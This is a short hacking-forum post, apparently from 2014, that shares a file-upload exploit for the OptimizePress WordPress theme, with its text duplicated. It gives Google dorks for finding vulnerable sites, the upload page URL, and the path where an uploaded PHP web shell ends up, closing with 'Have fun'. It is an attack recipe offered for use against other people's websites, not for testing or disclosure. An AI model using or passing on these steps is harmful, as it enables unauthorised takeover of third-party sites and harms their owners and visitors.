WordPress OptimizePress Themes File Upload Vulnerability 02-05-2014, 04:28 AM
#1
Hello HC,
Today I am gonna share this exploit with you. :Thumbs-Up:
Google Dork :
Search on google with one of this dork & click on one result . And replace your url to be like this .
If the site is vulnerable to upload shell ,you will see a page like a photo I posted & you can upload your shell directly from there .
![[Image: image.png]](http://s9.postimg.org/vvotmgm73/image.png)
If you can upload your php shell successfully,then your shell path will be here .
Have fun .
Today I am gonna share this exploit with you. :Thumbs-Up:
Google Dork :
Code:
inurl:/wp-content/themes/OptimizePress/
inurl:/wp-content/uploads/optpress/Search on google with one of this dork & click on one result . And replace your url to be like this .
Code:
http://127.0.0.1/wp-content/themes/OptimizePress/lib/admin/media-upload.phpIf the site is vulnerable to upload shell ,you will see a page like a photo I posted & you can upload your shell directly from there .
![[Image: image.png]](http://s9.postimg.org/vvotmgm73/image.png)
If you can upload your php shell successfully,then your shell path will be here .
Code:
http://127.0.0.1/wp-content/uploads/optpress/images_comingsoon/yourshell.phpHave fun .
(This post was last modified: 02-05-2014, 04:30 AM by warl0ck08.)
![[+]](https://sinister.ly/images/modern/collapse_collapsed.png)